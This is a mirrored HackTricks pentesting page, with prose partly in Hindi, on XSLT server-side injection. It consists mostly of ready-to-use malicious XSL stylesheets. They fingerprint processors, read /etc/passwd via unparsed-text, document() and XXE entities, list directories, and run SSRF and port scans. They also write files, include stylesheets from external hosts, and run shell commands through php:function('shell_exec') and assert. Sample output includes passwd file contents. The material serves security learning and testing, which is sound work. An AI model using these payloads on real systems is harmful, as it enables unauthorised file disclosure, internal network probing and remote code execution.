mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
422 lines
17 KiB
Markdown
422 lines
17 KiB
Markdown
# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## Basic Information
|
||
|
||
XSLT एक तकनीक है जिसका उपयोग XML दस्तावेज़ों को विभिन्न प्रारूपों में परिवर्तित करने के लिए किया जाता है। यह तीन संस्करणों में आता है: 1, 2, और 3, जिसमें संस्करण 1 सबसे सामान्य रूप से उपयोग किया जाता है। परिवर्तन प्रक्रिया को या तो सर्वर पर या ब्राउज़र के भीतर निष्पादित किया जा सकता है।
|
||
|
||
सबसे अधिक उपयोग किए जाने वाले ढांचे में शामिल हैं:
|
||
|
||
- **Libxslt** Gnome से,
|
||
- **Xalan** Apache से,
|
||
- **Saxon** Saxonica से।
|
||
|
||
XSLT से संबंधित कमजोरियों के शोषण के लिए, आवश्यक है कि xsl टैग सर्वर साइड पर संग्रहीत हों, उसके बाद उस सामग्री तक पहुंच प्राप्त की जाए। ऐसी एक कमजोरी का उदाहरण निम्नलिखित स्रोत में दस्तावेजीकृत है: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
|
||
|
||
## Example - Tutorial
|
||
```bash
|
||
sudo apt-get install default-jdk
|
||
sudo apt-get install libsaxonb-java libsaxon-java
|
||
```
|
||
{% code title="xml.xml" %}
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<catalog>
|
||
<cd>
|
||
<title>CD Title</title>
|
||
<artist>The artist</artist>
|
||
<company>Da Company</company>
|
||
<price>10000</price>
|
||
<year>1760</year>
|
||
</cd>
|
||
</catalog>
|
||
```
|
||
{% endcode %}
|
||
|
||
{% code title="xsl.xsl" %}
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<html>
|
||
<body>
|
||
<h2>The Super title</h2>
|
||
<table border="1">
|
||
<tr bgcolor="#9acd32">
|
||
<th>Title</th>
|
||
<th>artist</th>
|
||
</tr>
|
||
<tr>
|
||
<td><xsl:value-of select="catalog/cd/title"/></td>
|
||
<td><xsl:value-of select="catalog/cd/artist"/></td>
|
||
</tr>
|
||
</table>
|
||
</body>
|
||
</html>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
{% endcode %}
|
||
|
||
निष्पादित करें:
|
||
```xml
|
||
saxonb-xslt -xsl:xsl.xsl xml.xml
|
||
|
||
Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
|
||
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
|
||
<html>
|
||
<body>
|
||
<h2>The Super title</h2>
|
||
<table border="1">
|
||
<tr bgcolor="#9acd32">
|
||
<th>Title</th>
|
||
<th>artist</th>
|
||
</tr>
|
||
<tr>
|
||
<td>CD Title</td>
|
||
<td>The artist</td>
|
||
</tr>
|
||
</table>
|
||
</body>
|
||
</html>
|
||
```
|
||
### फ़िंगरप्रिंट
|
||
|
||
{% code title="detection.xsl" %}
|
||
```xml
|
||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
|
||
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
|
||
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
|
||
<xsl:if test="system-property('xsl:product-name')">
|
||
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:product-version')">
|
||
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:is-schema-aware')">
|
||
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-serialization')">
|
||
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
|
||
/><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
|
||
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
|
||
/><br />
|
||
</xsl:if>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
{% endcode %}
|
||
|
||
और निष्पादित करें
|
||
```xml
|
||
$saxonb-xslt -xsl:detection.xsl xml.xml
|
||
|
||
Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
|
||
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
|
||
<h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON 9.1.0.8 from Saxonica<br><b>Vendor URL:</b>http://www.saxonica.com/<br>
|
||
```
|
||
### स्थानीय फ़ाइल पढ़ें
|
||
|
||
{% code title="read.xsl" %}
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
{% endcode %}
|
||
```xml
|
||
$ saxonb-xslt -xsl:read.xsl xml.xml
|
||
|
||
Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
|
||
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
|
||
<?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bash
|
||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||
sync:x:4:65534:sync:/bin:/bin/sync
|
||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||
```
|
||
### SSRF
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
|
||
<xsl:include href="http://127.0.0.1:8000/xslt"/>
|
||
<xsl:template match="/">
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### Versions
|
||
|
||
XSLT संस्करण के आधार पर अधिक या कम कार्य हो सकते हैं:
|
||
|
||
* [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/)
|
||
* [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/)
|
||
* [https://www.w3.org/TR/xslt-30/](https://www.w3.org/TR/xslt-30/)
|
||
|
||
## Fingerprint
|
||
|
||
इसे अपलोड करें और जानकारी प्राप्त करें
|
||
```xml
|
||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
|
||
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
|
||
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
|
||
<xsl:if test="system-property('xsl:product-name')">
|
||
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:product-version')">
|
||
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:is-schema-aware')">
|
||
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-serialization')">
|
||
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
|
||
/><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
|
||
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
|
||
/><br />
|
||
</xsl:if>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## SSRF
|
||
```xml
|
||
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
|
||
</esi:include>
|
||
```
|
||
## Javascript Injection
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<script>confirm("We're good");</script>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## Directory listing (PHP)
|
||
|
||
### **Opendir + readdir**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="php:function('opendir','/path/to/dir')"/>
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
</xsl:template></xsl:stylesheet>
|
||
```
|
||
### **Assert (var\_dump + scandir + false)**
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
|
||
<br />
|
||
</body>
|
||
</html>
|
||
```
|
||
## फ़ाइलें पढ़ें
|
||
|
||
### **आंतरिक - PHP**
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="unparsed-text('/etc/passwd', ‘utf-8')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### **आंतरिक - XXE**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
&ext_file;
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### **HTTP के माध्यम से**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="document('/etc/passwd')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
|
||
```xml
|
||
<!DOCTYPE xsl:stylesheet [
|
||
<!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
|
||
<xsl:template match="/">
|
||
&passwd;
|
||
</xsl:template>
|
||
```
|
||
### **आंतरिक (PHP-फंक्शन)**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="php:function('file_get_contents','/path/to/file')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
<xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
|
||
<br />
|
||
</body>
|
||
</html>
|
||
```
|
||
### पोर्ट स्कैन
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="document('http://example.com:22')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## Write to a file
|
||
|
||
### XSLT 2.0
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:result-document href="local_file.txt">
|
||
<xsl:text>Write Local File</xsl:text>
|
||
</xsl:result-document>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### **Xalan-J विस्तार**
|
||
```xml
|
||
<xsl:template match="/">
|
||
<redirect:open file="local_file.txt"/>
|
||
<redirect:write file="local_file.txt"/> Write Local File</redirect:write>
|
||
<redirect:close file="loxal_file.txt"/>
|
||
</xsl:template>
|
||
```
|
||
अन्य तरीकों से PDF में फ़ाइलें लिखें
|
||
|
||
## बाहरी XSL शामिल करें
|
||
```xml
|
||
<xsl:include href="http://extenal.web/external.xsl"/>
|
||
```
|
||
|
||
```xml
|
||
<?xml version="1.0" ?>
|
||
<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
|
||
```
|
||
## कोड निष्पादित करें
|
||
|
||
### **php:function**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0"
|
||
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
|
||
xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="php:function('shell_exec','sleep 10')" />
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" />
|
||
<br />
|
||
</body>
|
||
</html>
|
||
```
|
||
Execute code using other frameworks in the PDF
|
||
|
||
### **अधिक भाषाएँ**
|
||
|
||
**इस पृष्ठ पर आप अन्य भाषाओं में RCE के उदाहरण पा सकते हैं:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
|
||
|
||
## **क्लासेस से PHP स्थिर फ़ंक्शंस तक पहुँचें**
|
||
|
||
निम्नलिखित फ़ंक्शन क्लास XSL के स्थिर मेथड `stringToUrl` को कॉल करेगा:
|
||
```xml
|
||
<!--- More complex test to call php class function-->
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"
|
||
version="1.0">
|
||
<xsl:output method="html" version="XHTML 1.0" encoding="UTF-8" indent="yes" />
|
||
<xsl:template match="root">
|
||
<html>
|
||
<!-- We use the php suffix to call the static class function stringToUrl() -->
|
||
<xsl:value-of select="php:function('XSL::stringToUrl','une_superstring-àÔ|modifier')" />
|
||
<!-- Output: 'une_superstring ao modifier' -->
|
||
</html>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
(Example from [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls))
|
||
|
||
## More Payloads
|
||
* Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
|
||
* Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
|
||
|
||
## **Brute-Force Detection List**
|
||
|
||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
|
||
|
||
## **References**
|
||
|
||
* [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT\_SSRF.pdf)\\
|
||
* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)\\
|
||
* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
|
||
|
||
{% hint style="success" %}
|
||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|